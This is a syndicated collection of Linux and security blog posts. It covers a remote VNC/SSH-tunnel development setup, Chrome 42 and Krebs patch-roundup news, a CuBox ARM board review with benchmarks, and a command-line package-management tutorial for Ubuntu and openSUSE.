First, we spin up the server on a host. There are several hosting companies; I’ve used Amazon Web Services, Rackspace, and DigitalOcean. My own personal preference for the operating system is Ubuntu Linux with LXDE. LXDE is a full desktop environment that includes the OpenBox window manager. I personally like OpenBox because of its simplicity while maintaining visual appeal. And LXDE is nice because, as its name suggests (Lightweight X11 Desktop Environment), it’s lightweight. However, many different environments and window managers will work. (I tried a couple tiling window managers such as i3, and those worked pretty well too.)

The usual order of installation goes like this: You use the hosting company’s website to spin up the server, and you provide a key file that will be used for logging into the server. You can usually use your own key that you generate, or have the service generate a key for you, in which case you download the key and save it. Typically when you provide a key, the server will automatically be configured to allow logins only over SSH with the key file. If not, you’ll want to disable password logins yourself.
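For reference, key-only login comes down to a couple of lines in the SSH daemon’s configuration. This is a sketch of the relevant /etc/ssh/sshd_config settings (restart the ssh service after editing):

```
# /etc/ssh/sshd_config -- allow key-file logins only
PasswordAuthentication no
ChallengeResponseAuthentication no
PermitRootLogin without-password
```

With these in place, password guessing gets an attacker nowhere; only holders of an authorized key can log in.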

Connect to the server

The next step is to actually log into the server through an SSH command line and first set up a user for yourself that isn’t root, and then set up the desktop environment. You can log in from your desktop Linux, but if you like, this is a good chance to try out logging in from an Android or iOS tablet. I use JuiceSSH; a lot of people like ConnectBot. And there are others. But whichever you get, make sure it allows you to log in using a key file. (Key files can be created with or without a password. Also make sure the app you use allows you to use whichever key file type you created–password or no password.)

Copy your key file to your tablet. The best way is to connect the tablet to your computer, and transfer the file. However, if you want a quick and easy way to do it, you can email it. But be aware that you’re sending the private key file through an email system that other people could potentially access. It’s your call whether you want to do that. Either way, get the file installed on the tablet, and then configure the SSH app to log in using the key file, using the app’s instructions.

Then using the app, connect to your server. You’ll need the username, even though you’re using a key file (the server needs to know who you’re logging in as with the key file, after all); AWS typically uses “ubuntu” for the username for Ubuntu installations; others simply give you the root user. For AWS, to do the installation you’ll need to type sudo before each command since you’re not logged in as root, but won’t be asked for a password when running sudo. On other cloud hosts you can run the commands without sudo since you’re logged in as root.

Oh and by the way, because we don’t yet have a desktop environment, you’ll be typing commands to install the software. If you’re not familiar with the package installation tools, now is a chance to learn about them. For Debian-based systems (including Ubuntu), you’ll use apt-get. Other systems use yum, which is a command-line interface to the RPM package manager.

Install LXDE

From the command-line, it’s time to set up LXDE, or whichever desktop you prefer. One thing to bear in mind is that while you can run something big like Cinnamon, ask yourself if you really need it. Cinnamon is big and cumbersome. I use it on my desktop, but not on my hosted servers, opting instead for more lightweight desktops like LXDE. And if you’re familiar with desktops such as Cinnamon, LXDE will feel very similar.

There are lots of instructions online for installing LXDE or other desktops, and so I won’t reiterate the details here. DigitalOcean has a fantastic blog with instructions for installing a similar desktop, XFCE.

Install a VNC server

Then you need to install a VNC server. Instead of using TightVNC, which a lot of people suggest, I recommend vnc4server because it allows for easy resolution changes, as I’ll describe shortly.

While setting up the VNC server, you’ll create a VNC username. You can just use a username and password for VNC, and from there you’re able to connect from a VNC client app to the system. However, the connection won’t be secure. Instead, you’ll want to connect through what’s called an SSH tunnel. The SSH tunnel is basically an SSH session into the server that is used for passing connections that would otherwise go directly over the internet.

When you connect to a server over the Internet, you use a protocol and a port. VNC usually uses 5900 or 5901 for the port. But with an SSH tunnel, the SSH app listens on a port on the same local device, such as 5900 or 5901. Then the VNC app, instead of connecting to the remote server, connects locally to the SSH app. The SSH app, in turn, passes all the data on to the remote system. So the SSH serves as a go-between. But because it’s SSH, all the data is secure.

So the key is setting up a tunnel on your tablet. Some VNC apps can create the tunnel; others can’t and you need to use a separate app. JuiceSSH can create a tunnel, which you can use from other apps. My preferred VNC app, Remotix, on the other hand, can do the tunnel itself for you. It’s your choice how you do it, but you’ll want to set it up.

The app will have instructions for the tunnel. In the case of JuiceSSH, you specify the server you’re connecting to and the port, such as 5900 or 5901. Then you also specify the local port number the tunnel will be listening on. You can use any available port, but I’ll usually use the same port as the remote one. If I’m connecting to 5901 on the remote, I’ll have JuiceSSH also listen on 5901. That makes it easier to keep straight. Then you’ll open up your VNC app, and instead of connecting to a remote server, you connect to the port on the same tablet. For the server you just use 127.0.0.1 (localhost), which is the IP address of the device itself. So to re-iterate:

  1. JuiceSSH connects, for example, to 5901 on the remote host. Meanwhile, it opens up 5901 on the local device.
  2. The VNC app connects to 5901 on the local device. It doesn’t need to know anything about what remote server it’s connecting to.
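If it helps to see the tunnel as one piece: on a desktop Linux machine, the equivalent of those two steps is a single OpenSSH invocation. The host address and key path below are hypothetical; substitute your own:

```shell
# -N: no remote shell, just forward ports
# -L: forward local port 5901 to port 5901 on the server's loopback
# (hypothetical key path and server address -- substitute your own)
TUNNEL='ssh -i ~/.ssh/dev-server.pem -N -L 5901:localhost:5901 ubuntu@203.0.113.10'
echo "$TUNNEL"   # run this, then point the VNC app at 127.0.0.1:5901
```

The VNC app then connects to 127.0.0.1:5901 exactly as in step 2; it never needs to know the remote address.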

But some VNC apps don’t need another app to do the tunneling, and instead provide the tunnel themselves. Remotix can do this; if you set up your app to do so, make sure you understand that you’re still tunneling. You provide the information needed for the SSH tunnel, including the key file and username. Then Remotix does the rest for you.

Once you get the VNC app going, you’ll be in. You should see a desktop open with the LXDE logo in the background. Next, you’ll want to go ahead and configure the VNC client to your liking; I prefer to control the mouse using drags that simulate a trackpad; other people like to control the mouse by tapping exactly where you want to click. Remotix and several other apps let you choose either configuration.

Configuring the Desktop

Now let’s configure the desktop. One issue I had was getting the desktop to look good on my 10-inch tablet. This involved configuring the look and feel by clicking the taskbar menu > Preferences > Customize Look and Feel (or running lxappearance from the command line).


I also used OpenBox’s own configuration tool by clicking the taskbar menu > Preferences > OpenBox Configuration Manager (or running obconf).


My larger tablet’s screen isn’t huge at 10 inches, so I configured the menu bars and buttons and such to be somewhat large for a comfortable view. One issue is the tablet has such a high resolution that if I used the maximum resolution, everything was tiny. As such, I needed to be able to change resolutions based on the work I was doing, as well as based on which tablet I was using. This involved configuring the VNC server, though, not LXDE and OpenBox. So let’s look at that.

In order to change resolution on the fly, you need a program that can manage the RandR extensions, such as xrandr. But the TightVNC server that seems popular doesn’t work with RandR. Instead, I found that the vnc4server program works with xrandr, which is why I recommend using it instead. When you configure vnc4server, you’ll want to provide the different resolutions in the command’s -geometry option. Here’s an init.d service configuration file that does just that. (I modified this based on one I found on DigitalOcean’s blog.)

#!/bin/sh
export USER="jeff"
DISPLAY="1"
OPTIONS="-depth 16 -geometry 1920x1125 -geometry 1240x1920 -geometry 2560x1500 -geometry 1920x1080 -geometry 1774x1040 -geometry 1440x843 -geometry 1280x1120 -geometry 1280x1024 -geometry 1280x750 -geometry 1200x1100 -geometry 1024x768 -geometry 800x600 :${DISPLAY}"
. /lib/lsb/init-functions
case "$1" in
start)
    log_action_begin_msg "Starting vncserver for user '${USER}' on localhost:${DISPLAY}"
    su ${USER} -c "/usr/bin/vnc4server ${OPTIONS}"
    ;;
stop)
    log_action_begin_msg "Stopping vncserver for user '${USER}' on localhost:${DISPLAY}"
    su ${USER} -c "/usr/bin/vnc4server -kill :${DISPLAY}"
    ;;
restart)
    $0 stop
    $0 start
    ;;
esac
exit 0

The key here is the OPTIONS line with all the -geometry options. These will show up when you run xrandr from the command line:


You can use your VNC login to modify the file in the init.d directory (and indeed I did, using the editor called scite). But then after making these changes, you’ll need to restart the VNC service just this one time, since you’re changing its service settings. Doing so will end your current VNC session, and it might not restart correctly. So you might need to log in through JuiceSSH to restart the VNC server. Then you can log back in with the VNC server. (You also might need to restart the SSH tunnel.) After you do, you’ll be able to configure the resolution. And from then on, you can change the resolution on the fly without restarting the VNC server.

To change resolutions without having to restart the VNC server, just type:

xrandr -s 1

Replace 1 with the number of the resolution you want, as listed by xrandr.

Server Concerns

After everything is configured, you’re free to use the software you’re familiar with. The only catch is that hosts charge a good bit for servers with plenty of RAM and disk space, so you might be limited in what you can run by the amount of RAM and the number of cores. Still, I’ve found that with just 2GB of RAM and 2 cores, running Ubuntu and LXDE, I can keep open Chrome with a few pages, LibreOffice with a couple of documents, Geany for my code editing, my own server software running under node.js for testing, and a MySQL server. Occasionally, if I get too many Chrome tabs open, the system will suddenly slow way down and I have to shut down tabs to free up memory. Sometimes I run MySQL Workbench and it can bog things down a bit too, but it isn’t bad if I close LibreOffice and leave only one or two Chrome tabs open. In general, for most of my work, I have no problems at all.

And on top of that, if I do need more horsepower, I can spin up a bigger server with 4GB or 8GB and four cores or eight cores. But that gets costly and so I don’t do it for too many hours.

Multiple Screens

For fun, I did manage to get two screens going on a single desktop, one on my bigger 10-inch ASUS transformer tablet, and one on my smaller Nexus 7 all from my Linux server running on a public cloud host, complete with a single mouse moving between the two screens. To accomplish this, I started two VNC sessions, one from each tablet, and then from the one with the mouse and keyboard, I ran:

x2x -east -to :1

This basically connected the single mouse and keyboard to both displays. It was a fun experiment, but in my case it provided little practical value because it wasn’t like a true dual display on a desktop computer. I couldn’t move windows between the displays, and the Chrome browser won’t open under more than one X display. For web development, I wanted to open the Chrome browser on one tablet and the Chrome JavaScript debug window on the other, but that didn’t work out.

Instead, what I found more useful was to have an SSH command-line shell on the smaller tablet, and that’s where I would run my node.js server code, which was printing out debug information. Then on the other I would have the browser running. That way I can glance back and forth without switching between windows on the single VNC login on the bigger tablet.

Back to Security

I can’t overstate the importance of making sure you have your security set up, and that you understand how the security works and what the ramifications are. I highly recommend using SSH with key-file logins only, with no password logins allowed. And treat this as a development or test machine; don’t put customer data on it that could open you up to lawsuits in the event the machine gets compromised.

Instead, for production machines, allocate your production servers using all the best practices laid out by your own IT department security rules, and the host’s own rules. One issue I hit is my development machine needs to log into git, which requires a private key. My development machine is hosted, which means that private key is stored on a hosted server. That may or may not be a good idea in your case; you and your team will need to decide whether to do it. In my case, I decided I could afford the risk because the code I’m accessing is mostly open-source and there’s little private intellectual property involved. So if somebody broke into my development machine, they would have access to the source code for a small but non-vital project I’m working on, and drafts of these articles–no private or intellectual data.

Web Developers and A Pesky Thing Called Windows

Before I wrap this up, I want to present a topic for discussion. Over the past few years I’ve noticed that a lot of individual web developers use a setup quite similar to what I’m describing. In a lot of cases they use Windows instead of Linux, but the idea is the same regardless of operating system. But where they differ from what I’m describing is they host their entire customer websites and customer data on that one machine, and there is no tunneling; instead, they just type in a password. That is not what I’m advocating here. If you are doing this, please reconsider. (I personally know at least three private web developers who do this.)

Regardless of operating system, take some time to understand the ramifications here. First, by logging in with a full desktop environment, you’re possibly slowing down the machine for your dev work. And if you mess something up and have to reboot, your clients’ websites aren’t available during that time. Are you using replication? Are you using private networking? Are you running MySQL or some other database on the same machine instead of behind a virtual private network? Entire books could be (and have been) written on such topics and the best practices. Learn about replication; learn about virtual private networking and how to shield your database servers from outside traffic; and so on. And most importantly, consider the security issues. Are you hosting customer data on a site that could easily be compromised? That could spell L-A-W-S-U-I-T. And that brings me to my conclusion for this series.

Concluding Remarks

Some commenters on the previous articles have brought up some valid points; one even used the phrase “playing.” While I really am doing development work, I’m definitely not doing this on production machines. If I were, that would indeed be playing and not be a legitimate use for a production machine. Use SSH for the production machines, and pick an editor to use and learn it. (I like vim, personally.) And keep the customer data on a server that is accessible only from a virtual private network. Read this to learn more.

Learn how to set up and configure SSH. And if you don’t understand all this, then please, practice and learn it; there are a million web sites out there that teach this stuff. But if you do understand it and can minimize the risk, then you really can get work done from nearly anywhere. I have become far more productive. If I want to run to a coffee shop and do some work, I can, without having to take a laptop along. Times are good! Learn the rules, follow the best practices, and be productive.
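A minimal sketch of the SSH setup being recommended, assuming an OpenSSH server on a Debian-family machine (the host name is a placeholder; the paths are the usual OpenSSH defaults, not details from the article):

```shell
# Generate a key pair and install the public key on the dev station
# ("devbox" is a placeholder host name):
ssh-keygen -t rsa -b 4096 -f ~/.ssh/id_rsa
ssh-copy-id user@devbox
# Then, in /etc/ssh/sshd_config on the server, disable password logins:
#   PasswordAuthentication no
#   PermitRootLogin no
# and reload the daemon to apply the change:
sudo service ssh reload
```

With password authentication off, brute-force login attempts against the machine become useless, which matters if the SSH port is reachable from anywhere.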

See the previous tutorials:

How to Set Up Your Linux Dev Station to Work From Anywhere

Choosing Software to Work Remotely from Your Linux Dev Station

Darknet - The Darkside: Google Chrome 42 Stomps A LOT Of Bugs & Disables Java By Default

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

Ah finally, the end of NPAPI is coming. A relic from the Netscape era, the Netscape Plugin API causes a lot of instability in Chrome as well as security issues. It means Java is now disabled by default, along with other NPAPI-based plugins, in Google Chrome 42. Chrome will be removing support for NPAPI totally […]

The post Google Chrome 42 Stomps…

Read the full post at

Krebs on Security: Critical Updates for Windows, Flash, Java

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Get your patch chops on people, because chances are you’re running software from Microsoft, Adobe or Oracle that received critical security updates today. Adobe released a Flash Player update to fix at least 22 flaws, including one flaw that is being actively exploited. Microsoft pushed out 11 update bundles to fix more than two dozen bugs in Windows and associated software, including one that was publicly disclosed this month. And Oracle has an update for its Java software that addresses at least 15 flaws, all of which are exploitable remotely without any authentication.

Adobe’s patch includes a fix for a zero-day bug (CVE-2015-3043) that the company warns is already being exploited. Users of the Adobe Flash Player for Windows and Macintosh should update to the latest version of Adobe Flash Player (the current versions for other OSes are listed in the chart below).

If you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, should automatically update to version

Google has an update available for Chrome that fixes a slew of flaws, and I assume it includes this Flash update, although the Flash checker pages only report that I now have version 17.0.0 installed after applying the Chrome update and restarting (the Flash update released last month put that version at, so this is not particularly helpful). To force the installation of an available update, click the triple bar icon to the right of the address bar, select “About Google Chrome,” click the apply update button and restart the browser.

The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox or Opera).

Microsoft has released 11 security bulletins this month, four of which are marked “critical,” meaning attackers or malware can exploit them to break into vulnerable systems with no help from users, save for perhaps visiting a booby-trapped or malicious Web site. The Microsoft patches fix flaws in Windows, Internet Explorer (IE), Office, and .NET.

The critical updates apply to two Windows bugs, IE, and Office. .NET updates have a history of taking forever to apply and introducing issues when applied with other patches, so I’d suggest Windows users apply all other updates, restart and then install the .NET update (if available for your system).

Oracle’s quarterly “critical patch update” plugs 15 security holes. If you have Java installed, please update it as soon as possible. Windows users can check for the program in the Add/Remove Programs listing in Windows, or visit and click the “Do I have Java?” link on the homepage. Updates also should be available via the Java Control Panel or

If you really need and use Java for specific Web sites or applications, take a few minutes to update this software. In the past, updating via the control panel auto-selected the installation of third-party software, so be sure to look for any pre-checked “add-ons” before proceeding with an update through the Java control panel. Also, Java 7 users should note that Oracle has ended support for Java 7 after this update. The company has been quietly migrating Java 7 users to Java 8, but if this hasn’t happened for you yet and you really need Java installed in the browser, grab a copy of Java 8. The recommended version is Java 8 Update 40.

Otherwise, seriously consider removing Java altogether. I have long urged end users to junk Java unless they have a specific use for it (this advice does not scale for businesses, which often have legacy and custom applications that rely on Java). This widely installed and powerful program is riddled with security holes, and is a top target of malware writers and miscreants.

If you have an affirmative use or need for Java, there is a way to have this program installed while minimizing the chance that crooks will exploit unknown or unpatched flaws in the program: unplug it from the browser unless and until you’re at a site that requires it (or at least take advantage of click-to-play, which can block Web sites from displaying both Java and Flash content by default). The latest versions of Java let users disable Java content in web browsers through the Java Control Panel. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

Many people confuse Java with JavaScript, a powerful scripting language that helps make sites interactive. Unfortunately, a huge percentage of Web-based attacks use JavaScript tricks to foist malicious software and exploits onto site visitors. For more about ways to manage JavaScript in the browser, check out my tutorial Tools for a Safer PC.

Linux How-Tos and Linux Tutorials: The CuBox: Linux on ARM in Around 2 Inches Cubed

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Ben Martin. Original post: at Linux How-Tos and Linux Tutorials

The CuBox is a 2-inch cubed ARM machine that can be used as a set-top box, a small NAS or database server, or in many other interesting applications. In my ongoing comparison of ARM machines, including the BeagleBone Black, Cubieboard, and others, the CuBox has the fastest IO performance for SSD that I’ve tested so far.

There are a few models, and ways to customize each one: you can choose between dual or quad cores, 1 or 2 gigabytes of RAM, 100 megabit or gigabit ethernet, and whether you want wifi and bluetooth. This gives a price range from $90 to $140 depending on which features you’re after. We’ll take a look at the CuBox i4Pro, which is the top-of-the-line model with all the bells and whistles.

CuBox Features

Most of the connectors on the CuBox are on the back side. The connectors include gigabit ethernet, two USB 2.0 ports, a full sized HDMI connector, eSATA, power input, and a microSD slot. Another side of the CuBox also features an Optical S/PDIF Audio Out. The power supply is a 5 Volt/3 Amp unit and connects using a DC jack input on the CuBox.

One of the first things I noticed when unpacking the CuBox is that it is small, coming in at 2 by 2 inches in length and width and around 1 and 3/4 inches tall. By contrast, a Raspberry Pi 2 in a case comes out at around 3.5 inches long and just under 2.5 inches wide. The CuBox stands taller on the table than the Raspberry Pi.

When buying the CuBox you can choose to get either Android 4.4 or OpenELEC/XBMC on your microSD card. You can also install Debian, Fedora, openSUSE, and others once it arrives.

The CuBox i4Pro had Android 4.4.2 pre-installed. The first boot up sat at the “Android” screen for minutes, making me a little concerned that something was amiss. After the delay you are prompted to select the app launcher that you want to use and then you’re in business. A look at the apps that are available by default shows Google Keep and Drive as well as the more expected apps like Youtube, Gmail, and the Play Store. The YouTube app was recent enough to include an option to Chromecast the video playback. Some versions of Android distributed with small ARM machines do not come with the Play Store by default, so it’s good to see it here right off the bat.

One app that I didn’t expect was the Ethernet app. This lets you check what IP address, DNS settings, and proxy server, if any, are in use at the moment. You can also specify to use DHCP (the default) or a static IP address and nominate a proxy server as well as a list of machines that the CuBox shouldn’t use the proxy to access.

When switching applications the graphical transitions were smooth. The mouse wheel worked as expected in the App/Widgets screen, the settings menu, and the YouTube app. The Volume +/- keys on a multimedia keyboard changed the volume but only in increments of fully on or fully off. That might not be an issue if you are controlling the volume with your television or amp instead of the CuBox. Playback in the YouTube app was smooth and transitioned to full screen playback without any issues.

The Chrome browser (version 31.0.1650.59) got 2,445 overall for the Octane 2.0 benchmark. To contrast, on a 3-year-old Mac Air, Chrome (version 41.0.2272.89) got 13,542 overall.

Installing Debian

The microSD slot in the CuBox is not spring-loaded, so to remove the card you have to use your fingernail to carefully prise it out of the slot.

Switching to Debian can be done by downloading the image and using a command like the one below to copy that image to a microSD card. I kept the original card and used a new, second microSD card to write Debian onto so I could easily switch between Debian and Android. Once writing is done, slowly prise out the original microSD card and insert the newly created Debian microSD card.

sudo dd if=Cubox-i_Debian_2.6_wheezy_3.14.14.raw of=/dev/sdX bs=4M

(Replace /dev/sdX with the device node of your microSD card; double-check it with lsblk first, as dd will overwrite whatever it is pointed at.)

There is also support for installing and running a desktop on your CuBox/Debian setup. That extends to experimental support for GPU and VPU acceleration on the CuBox. On my Debian installation I tried to hardware-decode the Big Buck Bunny video, but it seems some more tinkering is needed to get hardware decoding working. Using the “GeexBox XBMC ‐ A Kodi Media Center” version 3.1 distribution the same file played fine, so hardware decoding is supported by the CuBox; it just might take a little more tinkering to get at it if you want to run Debian.

The Debian image boots to a text console by default. This is easily remedied by installing a desktop environment; I found that Xfce worked well on the CuBox.

CuBox Performance

Digging around in /sys you should find the directory /sys/devices/system/cpu/cpu0/cpufreq, which contains interesting files like cpuinfo_cur_freq and cpuinfo_max_freq. For me these showed about 0.8 GHz and 1.2 GHz respectively.
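Those values can be read straight from sysfs; a quick sketch (frequencies are reported in kHz, and cpuinfo_cur_freq may require root or be absent on kernels that don’t expose cpufreq):

```shell
# Print the current and maximum CPU frequency, with a fallback message
# for kernels that do not expose the cpufreq interface.
for f in cpuinfo_cur_freq cpuinfo_max_freq; do
  cat "/sys/devices/system/cpu/cpu0/cpufreq/$f" 2>/dev/null \
    || echo "$f: not exposed on this kernel"
done
```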

The OpenSSL benchmark is a single core test. Some other ARM machines like the ODroid-XU are clocked much faster than the CuBox, which will have an impact on the OpenSSL benchmark.

Compiling OpenSSL 1.0.1e on four cores took around 6.5 minutes. Performance for digests and ciphers was in a similar ballpark to the BeagleBone Black. For 1,024-bit RSA signatures the CuBox beat the BeagleBone Black, at roughly 200 to the BeagleBone’s 160 signatures per second.
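For reference, figures like these come from invocations along the following lines (openssl speed prints sign/s and verify/s columns for RSA; exact output varies by OpenSSL version, and a full run takes a while):

```shell
# Single-core RSA benchmark, the kind used for the numbers above:
openssl speed rsa1024
# The -multi flag runs the same test on several cores in parallel:
openssl speed -multi 4 rsa1024
```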

[Charts: CuBox cipher, digest, and RSA signing benchmark results.]

Iceweasel 31.5 gets an octane of 2,015. For comparison, Iceweasel 31.4.0esr-1 on the Raspberry Pi 2 got an overall Octane score of 1,316.

To test 2Dgraphics performance I used version 1.0.1 of the Cairo Performance Demos. The gears test runs three turning gears; the chart runs four line graphs; the fish is a simulated fish tank with many fish swimming around; gradient is a filled curved edged path that moves around the screen; and flowers renders rotating flowers that move up and down the screen. For comparison I used a desktop machine running an Intel 2600K CPU with an NVidia GTX 570 card which drives two screens, one at 2560 x 1440 and the other at 1080p.

[Table: Cairo Performance Demos results (gears, chart, fish, gradient, flowers) for the Radxa at 1080, the BeagleBone Black at 720 and LVDS at 768, the desktop 2600K/NV570 driving two screens, the Raspberry Pi 2 at 1080, and the CuBox i4Pro at 1080.]
The CuBox also features an eSATA port, freeing you from microSD cards by making considerably faster SSD storage available. The eSATA port, multiple cores, and gigabit ethernet make the CuBox plus an external 2.5-inch SSD an interesting choice for a small NAS.

I connected a 120 GB SanDisk Extreme SSD to test the eSATA performance. For sequential IO, Bonnie++ could write about 120 megabytes/second, read about 150 MB/s, and rewrite blocks at about 50 MB/s. Overall, about 6,000 seeks/second were achieved.
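A Bonnie++ invocation along these lines produces the throughput and seek figures quoted above (the mount point, test size, and user are illustrative assumptions, not taken from the review):

```shell
# Sequential write/read/rewrite and seek benchmark against the SSD,
# assumed mounted at /mnt/ssd. -s sets the test file size in MiB (it
# should be at least twice RAM), -n 0 skips the file-creation tests,
# and -u names the user to run as when invoked as root.
bonnie++ -d /mnt/ssd -s 4096 -n 0 -u root
```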

For price comparison, a 120 GB SanDisk SSD currently goes for about $70 while a 128 GB SanDisk microSD card is around $100. The microSD card packaging mentions transfer rates of up to 48 MB/s. This is without considering that the SSD should perform better under server loads and when data is rewritten, such as on database servers.

For comparison, this is the same SSD I used when reviewing the Cubieboard. Although the CuBox and Cubieboard have similar-sounding names, they are completely different machines. Back then I found that the Cubieboard could write about 41 MB/s and read back 104 MB/s, with 1,849 seeks/s performed. The same SSD on the TI OMAP5432 got 66 MB/s write and 131 MB/s read, and could do 8,558 seeks/s. It is strange that the CuBox can transfer more data to and from the drive than the TI OMAP5432 while the OMAP5432 has better seek performance.

As far as eSATA data transfer goes, the CuBox is the ARM machine with the fastest IO performance for this SSD I have tested so far.

Power usage

At an idle graphical login with a mouse and keyboard plugged in, the CuBox drew 3.2 Watts. Disconnecting the keyboard and mouse dropped that to 2.8 W. With the keyboard and mouse reconnected for the remainder of the readings, running a single instance of OpenSSL speed pushed it to 4 W, and running four OpenSSL speed tests at once brought it up to 6.3 W. When running Octane the power ranged up to 5 W on occasion.

Final Words

While the smallest ARM machines try to attach directly to an HDMI port, if you plan to attach a realistic number of connections to the CuBox, such as power, ethernet, and some USB cables, then the HDMI-dongle form factor becomes a disadvantage. Instead, the CuBox opts to have (almost) all the connectors coming out of one side of the machine and to make that machine extremely small.

Being able to select from three base machines, and configure if you want (and want to pay for) wifi and bluetooth lets you customize the machine for the application you have in mind. The availability of eSATA and a gigabit ethernet connection allow the CuBox to be a small server — be that a NAS or a database server. The availability of two XBMC/Kodi disk images offering hardware video decoding also makes the CuBox an interesting choice for media playback.

We would like to thank SolidRun for supplying the CuBox hardware used in this review.

Linux How-Tos and Linux Tutorials: How to Use the Linux Command Line: Software Management

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Swapnil Bhartiya. Original post: at Linux How-Tos and Linux Tutorials


In the previous article of this series we learned some of the basics of the CLI (command line interface). In this article, we will learn how to manage software on your distro using only the command line, without touching the GUI at all.

I see great benefits in using the command line on any Ubuntu-based system. Each *buntu comes with its own ‘custom’ software management tool, which creates inconsistent experiences across the different flavors even though they use the same repositories under the hood. Life becomes easier with the CLI because the same command works across flavors and derivatives: if you are a Kubuntu user, you won’t have a problem supporting a Linux Mint user, because the CLI removes all the confusing wrappers. In this tutorial I am targeting all major distros: Debian/Ubuntu, openSUSE and Fedora.

Debian/Ubuntu: How to update repositories and install packages

There are two command line tools for the Debian family: ‘apt-get’ and ‘aptitude’. Aptitude is considered the superior tool, as it does a better job at resolving dependencies and managing packages. If your Ubuntu doesn’t come with ‘aptitude’ pre-installed, I suggest you install it.

Before we install any package we must always update the repositories so that they pull the latest information about available packages. This is not limited to Ubuntu: irrespective of the distro you use, you should always update the repositories before installing packages or running system updates. The command to update the repositories is:

sudo apt-get update

Once the repositories are updated you can install ‘aptitude’. The pattern is simply sudo apt-get install [package-name]:

sudo apt-get install aptitude

Ubuntu comes pre-installed with a bash-completion tool which makes life even easier with apt-get and aptitude. You don’t have to remember the complete name of the package, just type the first three letters and hit ‘Tab’ key. Bash will offer you all the packages starting with those three letters. So if I type ‘sudo apt-get install apt’ and then hit ‘Tab’ it will show me a long list of such packages.

Once aptitude is installed, you should start using it instead of apt-get. The usage is the same; just replace apt-get with aptitude.

Run system update/upgrades

Running a system upgrade is quite easy on Ubuntu and its derivatives. The command is simple:

sudo aptitude update
sudo aptitude upgrade

There is another command for system upgrades, called ‘dist-upgrade’. It is a bit more advanced than the plain ‘upgrade’ command because it performs some extra tasks: while ‘upgrade’ only upgrades the installed packages to their newest versions and never removes anything, ‘dist-upgrade’ also handles dependency changes and may remove packages that are no longer needed. If you want to upgrade the Linux kernel to the latest version, you also need ‘dist-upgrade’. Run the following commands:

sudo aptitude update
sudo aptitude dist-upgrade

Upgrade to latest version of Ubuntu

It’s extremely easy to upgrade the official flavors of Ubuntu (such as Ubuntu, Kubuntu, Xubuntu, etc.) from one major version to another. Just keep in mind that it should be from one release to the next, for example from 14.04 to 14.10 and not from 13.04 to 14.04. The only exception is the LTS releases, as you can jump from one LTS to the next. In order to run an upgrade you may have to install an additional package:

sudo aptitude install update-manager-core 

Now run the following command to do the release upgrade:

sudo aptitude do-release-upgrade

While upgrading from one release to another, keep in mind that although almost all official Ubuntu flavors support such upgrades, it may not work on unofficial flavors or derivatives like Linux Mint or elementary OS. You must check the official forums of those distros before attempting an upgrade.

Another important point: always back up your data before running a distribution upgrade, and run a repository update followed by dist-upgrade first.

How to remove packages

It’s very easy to remove packages via the command line. Just use the ‘remove’ option instead of ‘install’. So if you want to remove ‘firefox’, the command would be:

sudo aptitude remove firefox

If you also want to remove the configuration files related to that package, for a fresh start or to trim down your system, then use the ‘purge’ option:

sudo aptitude purge firefox

To further clean your system and get rid of packages that are no longer needed, you should run the ‘autoremove’ command from time to time:

sudo apt-get autoremove

Installing binary packages

At times, developers and companies offer their software as downloadable .deb packages. To install such packages you need a different tool, called dpkg:

sudo dpkg -i /path-of-downloaded.deb

At times you may come across a broken-package error in the *buntus. You can check for broken packages by running this command:

sudo apt-get check

If there are any broken packages then you can run this command to fix them:

sudo apt-get -f install

How to add or remove repositories or PPAs

All repositories are listed in the file ‘/etc/apt/sources.list’. You can simply edit this file using ‘nano’ or your preferred editor and add new repositories there. In order to add new PPAs (personal package archives) to the system, use the following pattern:

sudo add-apt-repository ppa:[user]/[ppa-name]

For example, if you want to add the LibreOffice PPA, this would be the command:

sudo add-apt-repository ppa:libreoffice/ppa
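If you edit /etc/apt/sources.list by hand instead, each repository is a single ‘deb’ line. This is an illustrative Ubuntu 14.04 entry, not one you necessarily need to add:

```shell
# Format: deb <archive URL> <release codename> <component(s)>
deb http://archive.ubuntu.com/ubuntu trusty main restricted universe
```

Remember to run sudo apt-get update after editing the file so the new repository is actually read.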

openSUSE Software management

Once you understand how basic Linux commands work, it really doesn’t matter which distro you are using. That also makes it easier to hop distros, become distro-agnostic, refrain from tribalism, and use the distro that works best for you. If you are using openSUSE, then ‘apt-get’ or ‘aptitude’ is replaced by ‘zypper’.


Let’s run a system update. First you need to refresh the repository information:

sudo zypper refresh

Then run a system update:

sudo zypper up

Alternatively you can also use:

sudo zypper update

This command will upgrade all packages to their latest version. To install any package the command is:

sudo zypper in [package-name]

However, as usual, you should refresh the repositories before installing any package:

sudo zypper refresh

To uninstall any package run:

sudo zypper remove [package-name]

However, unlike Ubuntu or Arch Linux, the default shell setup of openSUSE doesn’t do a great job at auto-completion when it comes to managing packages. That’s where another shell, ‘zsh’, comes into play. You can easily install zsh on openSUSE (chances are it’s already installed):

sudo zypper in zsh

To use zsh just type zsh in the terminal and follow instructions to configure it. You can also change the default shell from ‘bash’ to ‘zsh’ by editing the ‘/etc/passwd’ file.

sudo nano /etc/passwd

Then replace ‘bash’ with ‘zsh’ for your user and for root. Once that’s set, the command line in openSUSE will be much more pleasant to use.
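Alternatively, instead of hand-editing /etc/passwd, the standard chsh utility makes the same change (the zsh path can differ per distro; check it first with ‘command -v zsh’):

```shell
# Change the login shell for the current user to zsh:
chsh -s /usr/bin/zsh
# For another account (e.g. root), name it explicitly:
sudo chsh -s /usr/bin/zsh root
```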

How to add new repositories in openSUSE

It’s very easy to add a repo to openSUSE. The pattern is: zypper ar -f [repository-URL] [alias]

So if I wanted to add a GNOME repository, this would be the command:

zypper ar -f obs://GNOME:STABLE:3.8/openSUSE_12.3 GS38

[It’s only an example, using an older Gnome repo, don’t try it on your system.]

How to install binaries in openSUSE

